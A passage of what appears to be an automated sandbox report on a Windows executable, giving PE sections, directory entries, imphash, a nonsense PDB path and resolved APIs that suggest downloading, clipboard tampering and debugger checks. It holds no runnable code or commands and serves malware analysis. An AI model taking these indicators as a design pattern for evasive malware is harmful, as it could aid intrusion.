- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00026000",
- "size_of_data": "0x00009000",
- "entropy": "4.71",
- "raw_address": "0x00025400",
- "virtual_size": "0x00008ee0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0002f000",
- "size_of_data": "0x00001a00",
- "entropy": "3.42",
- "raw_address": "0x0002e400",
- "virtual_size": "0x04e5d9ec",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e8d000",
- "size_of_data": "0x00009a00",
- "entropy": "6.00",
- "raw_address": "0x0002fe00",
- "virtual_size": "0x0000998c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".yum",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e97000",
- "size_of_data": "0x00000400",
- "entropy": "0.00",
- "raw_address": "0x00039800",
- "virtual_size": "0x00001200",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e99000",
- "size_of_data": "0x00002200",
- "entropy": "4.72",
- "raw_address": "0x00039c00",
- "virtual_size": "0x00002148",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e9c000",
- "size_of_data": "0x00002000",
- "entropy": "6.62",
- "raw_address": "0x0003be00",
- "virtual_size": "0x00001fcc",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x0002e630",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x0000004d"
- },
- {
- "virtual_address": "0x0002e680",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000028"
- },
- {
- "virtual_address": "0x04e99000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00002148"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x04e9c000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00001fcc"
- },
- {
- "virtual_address": "0x000261d0",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00026000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000174"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [
- {
- "ordinal": 1,
- "name": "MyFunc165@@4",
- "address": "0x425db0"
- }
- ],
- "guest_signers": {},
- "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
- "imported_dll_count": 1,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.SetErrorMode",
- "msvcrt.dll._controlfp",
- "msvcrt.dll._except_handler3",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__p__fmode",
- "msvcrt.dll.isalpha",
- "msvcrt.dll.__p__commode",
- "msvcrt.dll._adjust_fdiv",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._initterm",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll._acmdln",
- "msvcrt.dll.exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll._exit",
- "msvcrt.dll._snprintf",
- "msvcrt.dll.fclose",
- "msvcrt.dll.fseek",
- "msvcrt.dll.ftell",
- "msvcrt.dll.wcsstr",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.srand",
- "msvcrt.dll.rand",
- "msvcrt.dll._snwprintf",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "wininet.dll.InternetOpenUrlA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetOpenUrlW",
- "wininet.dll.InternetOpenW",
- "wininet.dll.InternetOpenA",
- "urlmon.dll.URLDownloadToFileW",
- "shlwapi.dll.PathFileExistsW",
- "shlwapi.dll.PathFindFileNameA",
- "shlwapi.dll.PathFindFileNameW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.GetLogicalDriveStringsW",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.FindClose",
- "kernel32.dll.WriteFile",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32Next",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.CreateProcessW",
- "user32.dll.SetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetClipboardData",
- "user32.dll.CloseClipboard",
- "user32.dll.CharUpperA",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegOpenKeyExW",
- "shell32.dll.ShellExecuteW",
- "ole32.dll.CoInitialize",
- "ole32.dll.CoCreateInstance",
- "msvcr100.dll.atexit",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "ExitProcess",
- "address": "0x426000"
- },
- {
- "name": "DebugActiveProcessStop",
- "address": "0x426004"
- },
- {
- "name": "lstrcpynA",
- "address": "0x426008"
- },
- {
- "name": "UnlockFile",
- "address": "0x42600c"
- },
- {
- "name": "GetFileAttributesExA",
- "address": "0x426010"
- },
- {
- "name": "GetTickCount",
- "address": "0x426014"
- },
- {
- "name": "GetNumberFormatA",
- "address": "0x426018"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42601c"
- },
- {
- "name": "LoadLibraryW",
- "address": "0x426020"
- },
- {
- "name": "GetConsoleAliasExesLengthW",
- "address": "0x426024"
- },
- {
- "name": "GetBinaryTypeA",
- "address": "0x426028"
- },
- {
- "name": "lstrlenW",
- "address": "0x42602c"
- },
- {
- "name": "Module32First",
- "address": "0x426030"
- },
- {
- "name": "GetLastError",
- "address": "0x426034"
- },
- {
- "name": "GetProcAddress",
- "address": "0x426038"
- },
- {
- "name": "PeekConsoleInputW",
- "address": "0x42603c"
- },
- {
- "name": "WTSGetActiveConsoleSessionId",
- "address": "0x426040"
- },
- {
- "name": "VirtualProtect",
- "address": "0x426044"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x426048"
- },
- {
- "name": "GetCPInfoExA",
- "address": "0x42604c"
- },
- {
- "name": "CloseHandle",
- "address": "0x426050"
- },
- {
- "name": "EncodePointer",
- "address": "0x426054"
- },
- {
- "name": "DecodePointer",
- "address": "0x426058"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42605c"
- },
- {
- "name": "RaiseException",
- "address": "0x426060"
- },
- {
- "name": "RtlUnwind",
- "address": "0x426064"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x426068"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42606c"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x426070"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x426074"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x426078"
- },
- {
- "name": "WriteFile",
- "address": "0x42607c"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x426080"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x426084"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x426088"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42608c"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x426090"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x426094"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x426098"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42609c"
- },
- {
- "name": "HeapSize",
- "address": "0x4260a0"
- },
- {
- "name": "HeapFree",
- "address": "0x4260a4"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4260a8"
- },
- {
- "name": "SetLastError",
- "address": "0x4260ac"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4260b0"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4260b4"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x4260b8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4260bc"
- },
- {
- "name": "GetFileType",
- "address": "0x4260c0"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x4260c4"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4260c8"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x4260cc"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4260d0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4260d4"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x4260d8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4260dc"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4260e0"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x4260e4"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x4260e8"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x4260ec"
- },
- {
- "name": "CreateEventW",
- "address": "0x4260f0"
- },
- {
- "name": "Sleep",
- "address": "0x4260f4"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x4260f8"
- },
- {
- "name": "TerminateProcess",
- "address": "0x4260fc"
- },
- {
- "name": "TlsAlloc",
- "address": "0x426100"
- },
- {
- "name": "TlsGetValue",
- "address": "0x426104"
- },
- {
- "name": "TlsSetValue",
- "address": "0x426108"
- },
- {
- "name": "TlsFree",
- "address": "0x42610c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x426110"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x426114"
- },
- {
- "name": "SetStdHandle",
- "address": "0x426118"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42611c"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x426120"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x426124"
- },
- {
- "name": "FreeLibrary",
- "address": "0x426128"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42612c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x426130"
- },
- {
- "name": "GetACP",
- "address": "0x426134"
- },
- {
- "name": "GetOEMCP",
- "address": "0x426138"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42613c"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x426140"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x426144"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x426148"
- },
- {
- "name": "CompareStringW",
- "address": "0x42614c"
- },
- {
- "name": "LCMapStringW",
- "address": "0x426150"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x426154"
- },
- {
- "name": "IsValidLocale",
- "address": "0x426158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42615c"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x426160"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x426164"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x426168"
- },
- {
- "name": "CreateFileW",
- "address": "0x42616c"
- }
- ],
- "dll": "KERNEL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": "hozatejiz.exe",
- "actual_checksum": "0x00044ae0",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00044ae0",
- "icon_hash": null,
- "entrypoint": "0x00403a61",
- "timestamp": "2018-06-17 04:22:09",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00025000",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x00024ebd",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00026000",
- "size_of_data": "0x00009000",
- "entropy": "4.71",
- "raw_address": "0x00025400",
- "virtual_size": "0x00008ee0",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0002f000",
- "size_of_data": "0x00001a00",
- "entropy": "3.42",
- "raw_address": "0x0002e400",
- "virtual_size": "0x04e5d9ec",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e8d000",
- "size_of_data": "0x00009a00",
- "entropy": "6.00",
- "raw_address": "0x0002fe00",
- "virtual_size": "0x0000998c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".yum",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x04e97000",
- "size_of_data": "0x00000400",
- "entropy": "0.00",
- "raw_address": "0x00039800",
- "virtual_size": "0x00001200",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e99000",
- "size_of_data": "0x00002200",
- "entropy": "4.72",
- "raw_address": "0x00039c00",
- "virtual_size": "0x00002148",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x04e9c000",
- "size_of_data": "0x00002000",
- "entropy": "6.62",
- "raw_address": "0x0003be00",
- "virtual_size": "0x00001fcc",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x0002e630",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x0000004d"
- },
- {
- "virtual_address": "0x0002e680",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000028"
- },
- {
- "virtual_address": "0x04e99000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00002148"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x04e9c000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00001fcc"
- },
- {
- "virtual_address": "0x000261d0",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000038"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00026000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000174"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [
- {
- "ordinal": 1,
- "name": "MyFunc165@@4",
- "address": "0x425db0"
- }
- ],
- "guest_signers": {},
- "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
- "imported_dll_count": 1,
- "versioninfo": []
- }
- }